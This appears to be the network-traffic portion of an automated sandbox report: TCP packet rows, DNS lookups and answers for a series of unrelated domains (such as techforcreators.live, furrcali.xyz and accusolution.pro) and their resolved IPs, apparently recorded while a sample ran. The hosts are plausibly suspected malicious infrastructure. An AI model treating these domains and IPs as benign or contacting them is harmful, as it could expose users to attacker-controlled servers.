                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.647389889 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.647429943 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.647550106 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.651093960 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.651132107 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.651222944 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.655118942 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.655230045 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.655328989 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.658859968 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.658902884 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.658989906 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.662802935 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.662899971 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.662985086 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.666723013 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.666774988 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.666858912 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.670494080 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.670545101 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.670625925 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.674132109 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.674294949 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.674370050 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.678016901 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.678060055 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.678144932 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.796566963 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.796744108 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.796830893 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.798270941 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.798378944 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.798415899 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.801949978 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.802006006 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.802078962 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.805464983 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.805521011 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.805596113 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.808582067 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.808671951 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.808760881 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.811913013 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.811964989 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.812021017 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.826402903 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.826494932 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.826601028 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.827991009 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.828111887 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.828159094 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.830549955 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.830699921 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.830785990 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.833955050 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.834049940 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.834141970 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.837405920 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.837464094 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.837558985 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.840209007 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.960005999 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:47.581681967 CET4996980192.168.2.4103.106.67.112
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:47.701543093 CET8049969103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:47.701903105 CET4996980192.168.2.4103.106.67.112
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:47.714456081 CET4996980192.168.2.4103.106.67.112
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:47.834781885 CET8049969103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:49.229652882 CET4996980192.168.2.4103.106.67.112
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:49.393665075 CET8049969103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:49.807540894 CET8049969103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:49.807645082 CET4996980192.168.2.4103.106.67.112
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:50.247828007 CET4997480192.168.2.4103.106.67.112
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:50.368062019 CET8049974103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:50.369371891 CET4997480192.168.2.4103.106.67.112
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:50.382694006 CET4997480192.168.2.4103.106.67.112
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:50.502875090 CET8049974103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:51.885890007 CET4997480192.168.2.4103.106.67.112
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:52.049572945 CET8049974103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:52.480031967 CET8049974103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:52.480210066 CET4997480192.168.2.4103.106.67.112
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:52.904469013 CET4998080192.168.2.4103.106.67.112
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:53.024359941 CET8049980103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:53.024568081 CET4998080192.168.2.4103.106.67.112
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:53.038630009 CET4998080192.168.2.4103.106.67.112
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:53.158819914 CET8049980103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:53.158868074 CET8049980103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:53.158900976 CET8049980103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:53.158930063 CET8049980103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:53.159017086 CET8049980103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:53.159046888 CET8049980103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:53.159095049 CET8049980103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:53.159123898 CET8049980103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:53.159151077 CET8049980103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:54.542108059 CET4998080192.168.2.4103.106.67.112
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:54.709352970 CET8049980103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:55.134424925 CET8049980103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:55.134593964 CET4998080192.168.2.4103.106.67.112
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:55.560533047 CET4998880192.168.2.4103.106.67.112
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:55.680747986 CET8049988103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:55.680977106 CET4998880192.168.2.4103.106.67.112
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:55.689892054 CET4998880192.168.2.4103.106.67.112
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:55.810107946 CET8049988103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:57.792366982 CET8049988103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:57.792649984 CET4998880192.168.2.4103.106.67.112
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:57.793524027 CET4998880192.168.2.4103.106.67.112
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:57.913439989 CET8049988103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:03.745424986 CET5000780192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:03.865408897 CET8050007185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:03.865777016 CET5000780192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:03.942928076 CET5000780192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:04.062799931 CET8050007185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:05.153470039 CET8050007185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:05.153528929 CET8050007185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:05.153572083 CET8050007185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:05.153666973 CET5000780192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:05.153667927 CET5000780192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:05.448426008 CET5000780192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:06.466707945 CET5001680192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:06.586781979 CET8050016185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:06.586879015 CET5001680192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:06.598787069 CET5001680192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:06.718930006 CET8050016185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:07.867351055 CET8050016185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:07.867394924 CET8050016185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:07.867470026 CET5001680192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:07.867997885 CET8050016185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:07.868172884 CET5001680192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:08.104713917 CET5001680192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:09.123003006 CET5002480192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:09.243242979 CET8050024185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:09.243340015 CET5002480192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:09.257201910 CET5002480192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:09.377377033 CET8050024185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:09.377418995 CET8050024185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:09.377455950 CET8050024185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:09.377484083 CET8050024185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:09.377537966 CET8050024185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:09.377567053 CET8050024185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:09.377652884 CET8050024185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:09.377681017 CET8050024185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:09.377713919 CET8050024185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:10.522846937 CET8050024185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:10.522866011 CET8050024185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:10.522876978 CET8050024185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:10.523000956 CET5002480192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:10.760982990 CET5002480192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:11.779508114 CET5003080192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:11.899266958 CET8050030185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:11.899466991 CET5003080192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:11.907931089 CET5003080192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:12.027589083 CET8050030185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:13.179289103 CET8050030185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:13.179306030 CET8050030185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:13.179332972 CET8050030185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:13.179553032 CET5003080192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:13.182163954 CET5003080192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:13.302316904 CET8050030185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:19.335339069 CET5003180192.168.2.452.223.13.41
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:19.455235004 CET805003152.223.13.41192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:19.455399036 CET5003180192.168.2.452.223.13.41
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:19.468746901 CET5003180192.168.2.452.223.13.41
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:19.589279890 CET805003152.223.13.41192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:20.552644968 CET805003152.223.13.41192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:20.552669048 CET805003152.223.13.41192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:20.552835941 CET5003180192.168.2.452.223.13.41
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:20.979530096 CET5003180192.168.2.452.223.13.41
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:21.998194933 CET5003280192.168.2.452.223.13.41
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:22.118160009 CET805003252.223.13.41192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:22.118355989 CET5003280192.168.2.452.223.13.41
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:22.130280972 CET5003280192.168.2.452.223.13.41
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:22.250365019 CET805003252.223.13.41192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:23.216377974 CET805003252.223.13.41192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:23.216403008 CET805003252.223.13.41192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:23.216474056 CET5003280192.168.2.452.223.13.41
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:23.635921001 CET5003280192.168.2.452.223.13.41
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:24.654257059 CET5003380192.168.2.452.223.13.41
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:24.774133921 CET805003352.223.13.41192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:24.774231911 CET5003380192.168.2.452.223.13.41
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:24.788057089 CET5003380192.168.2.452.223.13.41
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:24.907880068 CET805003352.223.13.41192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:24.907907963 CET805003352.223.13.41192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:24.907922029 CET805003352.223.13.41192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:24.907936096 CET805003352.223.13.41192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:24.907964945 CET805003352.223.13.41192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:24.907979012 CET805003352.223.13.41192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:24.907993078 CET805003352.223.13.41192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:24.908009052 CET805003352.223.13.41192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:24.908021927 CET805003352.223.13.41192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:25.875653982 CET805003352.223.13.41192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:25.875684023 CET805003352.223.13.41192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:25.875768900 CET5003380192.168.2.452.223.13.41
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:26.292051077 CET5003380192.168.2.452.223.13.41
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:27.592145920 CET5003480192.168.2.452.223.13.41
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:27.712286949 CET805003452.223.13.41192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:27.712552071 CET5003480192.168.2.452.223.13.41
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:27.719974995 CET5003480192.168.2.452.223.13.41
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:27.839982986 CET805003452.223.13.41192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:28.813452005 CET805003452.223.13.41192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:28.813478947 CET805003452.223.13.41192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:28.813592911 CET5003480192.168.2.452.223.13.41

                                                                                                                                                                                                                                              UDP Packets

                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:03.851908922 CET5834753192.168.2.41.1.1.1
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:04.838816881 CET5834753192.168.2.41.1.1.1
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:04.921974897 CET53583471.1.1.1192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:04.975923061 CET53583471.1.1.1192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:21.201204062 CET5525453192.168.2.41.1.1.1
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:22.198174953 CET5525453192.168.2.41.1.1.1
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:22.255072117 CET53552541.1.1.1192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:22.335341930 CET53552541.1.1.1192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:36.467350960 CET5657653192.168.2.41.1.1.1
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:36.953010082 CET53565761.1.1.1192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:51.373313904 CET5734653192.168.2.41.1.1.1
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:51.939840078 CET53573461.1.1.1192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:07.332532883 CET4986953192.168.2.41.1.1.1
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:07.634224892 CET53498691.1.1.1192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:15.686186075 CET6061053192.168.2.41.1.1.1
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:16.623874903 CET53606101.1.1.1192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:30.866060019 CET6513153192.168.2.41.1.1.1
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:31.406574011 CET53651311.1.1.1192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:46.857722998 CET6332253192.168.2.41.1.1.1
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:47.579477072 CET53633221.1.1.1192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:02.810803890 CET5472953192.168.2.41.1.1.1
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:03.721479893 CET53547291.1.1.1192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:18.186196089 CET6428753192.168.2.41.1.1.1
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:19.182872057 CET6428753192.168.2.41.1.1.1
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:19.332890034 CET53642871.1.1.1192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:19.332914114 CET53642871.1.1.1192.168.2.4

                                                                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:03.851908922 CET192.168.2.41.1.1.10xb04Standard query (0)www.techforcreators.liveA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:04.838816881 CET192.168.2.41.1.1.10xb04Standard query (0)www.techforcreators.liveA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:21.201204062 CET192.168.2.41.1.1.10xd085Standard query (0)www.llmsforrobot.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:22.198174953 CET192.168.2.41.1.1.10xd085Standard query (0)www.llmsforrobot.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:36.467350960 CET192.168.2.41.1.1.10x308cStandard query (0)www.yous.websiteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:51.373313904 CET192.168.2.41.1.1.10xf518Standard query (0)www.mirenzhibo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:07.332532883 CET192.168.2.41.1.1.10x4ba4Standard query (0)www.amorinc.clickA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:15.686186075 CET192.168.2.41.1.1.10x7bb8Standard query (0)www.sob.ripA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:30.866060019 CET192.168.2.41.1.1.10xa53cStandard query (0)www.aihuzhibo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:46.857722998 CET192.168.2.41.1.1.10x7ba6Standard query (0)www.furrcali.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:02.810803890 CET192.168.2.41.1.1.10x752bStandard query (0)www.accusolution.proA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:18.186196089 CET192.168.2.41.1.1.10x8974Standard query (0)www.seamarket.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:19.182872057 CET192.168.2.41.1.1.10x8974Standard query (0)www.seamarket.shopA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:04.921974897 CET1.1.1.1192.168.2.40xb04No error (0)www.techforcreators.live52.223.13.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:04.975923061 CET1.1.1.1192.168.2.40xb04No error (0)www.techforcreators.live52.223.13.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:22.255072117 CET1.1.1.1192.168.2.40xd085No error (0)www.llmsforrobot.xyz192.30.252.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:22.335341930 CET1.1.1.1192.168.2.40xd085No error (0)www.llmsforrobot.xyz192.30.252.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:36.953010082 CET1.1.1.1192.168.2.40x308cNo error (0)www.yous.website209.74.79.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:51.939840078 CET1.1.1.1192.168.2.40xf518No error (0)www.mirenzhibo.net202.95.11.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:07.634224892 CET1.1.1.1192.168.2.40x4ba4Name error (3)www.amorinc.clicknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:16.623874903 CET1.1.1.1192.168.2.40x7bb8No error (0)www.sob.rip94950.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:16.623874903 CET1.1.1.1192.168.2.40x7bb8No error (0)94950.bodis.com199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:31.406574011 CET1.1.1.1192.168.2.40xa53cNo error (0)www.aihuzhibo.net192.186.58.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:47.579477072 CET1.1.1.1192.168.2.40x7ba6No error (0)www.furrcali.xyz103.106.67.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:03.721479893 CET1.1.1.1192.168.2.40x752bNo error (0)www.accusolution.proaccusolution.proCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:03.721479893 CET1.1.1.1192.168.2.40x752bNo error (0)accusolution.pro185.68.108.243A (IP address)IN (0x0001)false
